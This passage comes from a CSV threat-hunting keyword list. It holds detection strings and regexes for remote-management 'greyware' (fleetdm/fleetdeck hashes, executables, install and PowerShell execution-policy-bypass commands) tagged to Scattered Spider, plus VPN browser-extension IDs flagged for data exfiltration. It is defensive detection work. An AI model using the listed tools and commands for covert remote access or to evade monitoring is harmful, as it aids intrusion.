TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e11e21d85234c890f047955456c220a95dfcb6f010fadd20fcb9e15ea43a4cf7*",".{0,1000}e11e21d85234c890f047955456c220a95dfcb6f010fadd20fcb9e15ea43a4cf7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*e3a9686198e872ef6984215ebcd18a3c2f57c8ca009dc3c23b485a88a92fff01*",".{0,1000}e3a9686198e872ef6984215ebcd18a3c2f57c8ca009dc3c23b485a88a92fff01.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e4997313fa56907981be64b670a5609df81c55ebeecc8fd26a8d7471c4f62317*",".{0,1000}e4997313fa56907981be64b670a5609df81c55ebeecc8fd26a8d7471c4f62317.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e54a67a249e4e87a3ee0ab2c0cd5edf58cd52eee67b5f2df4d15fad38c1880b3*",".{0,1000}e54a67a249e4e87a3ee0ab2c0cd5edf58cd52eee67b5f2df4d15fad38c1880b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e626c24d81970be447e683730e22ff4fccfbc720b6b9dff41bbd2f2419766380*",".{0,1000}e626c24d81970be447e683730e22ff4fccfbc720b6b9dff41bbd2f2419766380.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e73c16e92842b5e4889ca8e7b88901ddd5b59f85394e82ca8554c75d26250ebb*",".{0,1000}e73c16e92842b5e4889ca8e7b88901ddd5b59f85394e82ca8554c75d26250ebb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e7aed3b9cea264001849c7bb2bbd56a8772816c065663c6e954890a72be441b7*",".{0,1000}e7aed3b9cea264001849c7bb2bbd56a8772816c065663c6e954890a72be441b7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e84ef4bf8f7150620cdbb98da7f38f397eddc996b2b93dc7b00f8ae39a28635c*",".{0,1000}e84ef4bf8f7150620cdbb98da7f38f397eddc996b2b93dc7b00f8ae39a28635c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e99d21c07b1b29361d6eb4895c350a36651536eb1719d50c802d5067c4b723c9*",".{0,1000}e99d21c07b1b29361d6eb4895c350a36651536eb1719d50c802d5067c4b723c9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e9ca78d11b144352ca1d9ec83d7ec0f44fba238ae3ba46560ed01b45eaa1f232*",".{0,1000}e9ca78d11b144352ca1d9ec83d7ec0f44fba238ae3ba46560ed01b45eaa1f232.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*ebfdb029f616dcbd294b785874a77d5b62a08f92d562afb522309a07a36f472c*",".{0,1000}ebfdb029f616dcbd294b785874a77d5b62a08f92d562afb522309a07a36f472c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ed716e9d8a9382928e6a20bbac0f2245b7996125d9d86ace9c9a88fb9f8e4fde*",".{0,1000}ed716e9d8a9382928e6a20bbac0f2245b7996125d9d86ace9c9a88fb9f8e4fde.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*edb82e0716aa844b2d6d8ebfe4d4e08f41a0618fdd62b64623c8f590a39bc207*",".{0,1000}edb82e0716aa844b2d6d8ebfe4d4e08f41a0618fdd62b64623c8f590a39bc207.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ee3e0370955bb5c44e5a5370bdd268e5e948e18dbe86ae89e9f243f4a1668850*",".{0,1000}ee3e0370955bb5c44e5a5370bdd268e5e948e18dbe86ae89e9f243f4a1668850.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ee5974d52512f1d5e55fafef9e04969656c1dd2fa5919376f81bf62b1a6a04e9*",".{0,1000}ee5974d52512f1d5e55fafef9e04969656c1dd2fa5919376f81bf62b1a6a04e9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ef3cc05f5d86042c926a3243c081957445717960268743953793980df144b145*",".{0,1000}ef3cc05f5d86042c926a3243c081957445717960268743953793980df144b145.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ef67236f50b717490ba2d02669aac749eab81b805285e5780cb691006f26f742*",".{0,1000}ef67236f50b717490ba2d02669aac749eab81b805285e5780cb691006f26f742.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ef9ccb9743205b6cd63e965ded0ad5b6836d9c4f4d8b3bec5264bdfbf1c71651*",".{0,1000}ef9ccb9743205b6cd63e965ded0ad5b6836d9c4f4d8b3bec5264bdfbf1c71651.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f004ede766d83d38ded3358bef66fd56b564fcea19cde01f79dee4a426916448*",".{0,1000}f004ede766d83d38ded3358bef66fd56b564fcea19cde01f79dee4a426916448.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*f0585309751d285f47ef51783422235b20248a430dc6daca9d13e4755fd02721*",".{0,1000}f0585309751d285f47ef51783422235b20248a430dc6daca9d13e4755fd02721.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f193e6dd7595ee4163e6299c5196dcee429046f0f99175f5058ddce9348057bf*",".{0,1000}f193e6dd7595ee4163e6299c5196dcee429046f0f99175f5058ddce9348057bf.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f263d762ee5788d2773d167ed15e6fc41e874f8682b6df9c8f8215c07c836275*",".{0,1000}f263d762ee5788d2773d167ed15e6fc41e874f8682b6df9c8f8215c07c836275.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f3c40d7fc7a91a57e7689ada1c1b6b7167f4a740bb2124ea1c3a75d0bde8030b*",".{0,1000}f3c40d7fc7a91a57e7689ada1c1b6b7167f4a740bb2124ea1c3a75d0bde8030b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f3f3cc358d84f4adca20bf1ba7a0a08d733d54cfd6a62276b7b465a58902bf99*",".{0,1000}f3f3cc358d84f4adca20bf1ba7a0a08d733d54cfd6a62276b7b465a58902bf99.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f44a9e93bc06742004f0b5c74b00cf0689b4890b903803c338ef80b9fd69c173*",".{0,1000}f44a9e93bc06742004f0b5c74b00cf0689b4890b903803c338ef80b9fd69c173.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f4be7647922d6d458692d149c3aec12c3ecd84ed97761dd5478b1e10cbb94d7e*",".{0,1000}f4be7647922d6d458692d149c3aec12c3ecd84ed97761dd5478b1e10cbb94d7e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f6b2697a2c40fee8c1aeac7133b205797cf4d877500e96951199c06422a66e33*",".{0,1000}f6b2697a2c40fee8c1aeac7133b205797cf4d877500e96951199c06422a66e33.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*f7a9240b781a22fc573a4780da8dadaa761853d1247f21b9306083962e0197d0*",".{0,1000}f7a9240b781a22fc573a4780da8dadaa761853d1247f21b9306083962e0197d0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*f99653446a9eb4dbc8bb2bcbef659f8fe2af69d5ad9319eaba68c394cb1c2b06*",".{0,1000}f99653446a9eb4dbc8bb2bcbef659f8fe2af69d5ad9319eaba68c394cb1c2b06.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fa1883bb377e2154c9dc766235f92612b8187ce2121f5ba3c3da28f1ebe6de63*",".{0,1000}fa1883bb377e2154c9dc766235f92612b8187ce2121f5ba3c3da28f1ebe6de63.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*FAECC814-3F3F-4CA0-8C2B-72D5E4670B92*",".{0,1000}FAECC814\-3F3F\-4CA0\-8C2B\-72D5E4670B92.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#GUIDproject","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fb998e66174bc1cee14dff001bec28d4a43ad753885a95f25015d71db8ff39fb*",".{0,1000}fb998e66174bc1cee14dff001bec28d4a43ad753885a95f25015d71db8ff39fb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fc9a33902b9f6efc6ade3bd7cff30f476d6e7fcfa68d57d063c3ec03f8ac2bf8*",".{0,1000}fc9a33902b9f6efc6ade3bd7cff30f476d6e7fcfa68d57d063c3ec03f8ac2bf8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fd075f9c84e91c2f7c0937e730df44f3e9fe9b74c41bdf62645a9798cd1a45c5*",".{0,1000}fd075f9c84e91c2f7c0937e730df44f3e9fe9b74c41bdf62645a9798cd1a45c5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fe4a85694ea1405552e8bd6fabbff0a676ff428a529fb72e23ca48ca0d2f9ba7*",".{0,1000}fe4a85694ea1405552e8bd6fabbff0a676ff428a529fb72e23ca48ca0d2f9ba7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ff91f0d3a6ffcf273c455b50cd84d306e03e1ec0b650175bee3dde1480d1d113*",".{0,1000}ff91f0d3a6ffcf273c455b50cd84d306e03e1ec0b650175bee3dde1480d1d113.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetctl updates init*",".{0,1000}fleetctl\supdates\sinit.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck.io/prototype3/commander_svc*",".{0,1000}fleetdeck\.io\/prototype3\/commander_svc.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck_agent.exe*",".{0,1000}fleetdeck_agent\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck_agent_svc.exe*",".{0,1000}fleetdeck_agent_svc\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck_commander_launcher.exe*",".{0,1000}fleetdeck_commander_launcher\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck_commander_svc.exe*",".{0,1000}fleetdeck_commander_svc\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*fleetdeck_installer.exe*",".{0,1000}fleetdeck_installer\.exe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*fleetdeckfork/execfuncargs(*",".{0,1000}fleetdeckfork\/execfuncargs\(.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*http://localhost:1337*",".{0,1000}http\:\/\/localhost\:1337.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*http://localhost:1337/previewlogin*",".{0,1000}http\:\/\/localhost\:1337\/previewlogin.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*https://fleetdm.com/resources/install-fleetctl.sh*",".{0,1000}https\:\/\/fleetdm\.com\/resources\/install\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*npm install fleetctl*",".{0,1000}npm\sinstall\sfleetctl.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*powershell.exe -ExecutionPolicy Bypass -File cleanup_windows.ps1 
-uninstallOrbit*",".{0,1000}powershell\.exe\s\-ExecutionPolicy\sBypass\s\-File\scleanup_windows\.ps1\s\-uninstallOrbit.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*proceed: *.fleetdeck.io*",".{0,1000}proceed\:\s.{0,1000}\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*egblhcjfjmbjajhjhpmnlekffgaemgfh*",".{0,1000}egblhcjfjmbjajhjhpmnlekffgaemgfh.{0,1000}","greyware_tool_keyword","Fornex VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*gcknhkkoolaabfmlnjonogaaifnjlfnp*",".{0,1000}gcknhkkoolaabfmlnjonogaaifnjlfnp.{0,1000}","greyware_tool_keyword","FoxyProxy Standard","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dfkdflfgjdajbhocmfjolpjbebdkcjog*",".{0,1000}dfkdflfgjdajbhocmfjolpjbebdkcjog.{0,1000}","greyware_tool_keyword","Free Avira Phantom VPN","External VPN usage within corporate network","T1090.003 - T1133 - 
T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*macdlemfnignjhclfcfichcdhiomgjjb*",".{0,1000}macdlemfnignjhclfcfichcdhiomgjjb.{0,1000}","greyware_tool_keyword","Free Fast VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*inligpkjkhbpifecbdjhmdpcfhnlelja*",".{0,1000}inligpkjkhbpifecbdjhmdpcfhnlelja.{0,1000}","greyware_tool_keyword","Free One Touch VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dhadilbmmjiooceioladdphemaliiobo*",".{0,1000}dhadilbmmjiooceioladdphemaliiobo.{0,1000}","greyware_tool_keyword","Free Proxy VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*pgfpignfckbloagkfnamnolkeaecfgfh*",".{0,1000}pgfpignfckbloagkfnamnolkeaecfgfh.{0,1000}","greyware_tool_keyword","Free Proxy VPN","External 
VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*jpgljfpmoofbmlieejglhonfofmahini*",".{0,1000}jpgljfpmoofbmlieejglhonfofmahini.{0,1000}","greyware_tool_keyword","Free Residential VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*jgbaghohigdbgbolncodkdlpenhcmcge*",".{0,1000}jgbaghohigdbgbolncodkdlpenhcmcge.{0,1000}","greyware_tool_keyword","Free VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*majdfhpaihoncoakbjgbdhglocklcgno*",".{0,1000}majdfhpaihoncoakbjgbdhglocklcgno.{0,1000}","greyware_tool_keyword","Free VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" 
"*ifnaibldjfdmaipaddffmgcmekjhiloa*",".{0,1000}ifnaibldjfdmaipaddffmgcmekjhiloa.{0,1000}","greyware_tool_keyword","FREE VPN DEWELOPMENT","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*klnkiajpmpkkkgpgbogmcgfjhdoljacg*",".{0,1000}klnkiajpmpkkkgpgbogmcgfjhdoljacg.{0,1000}","greyware_tool_keyword","Free VPN for Chrome","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" 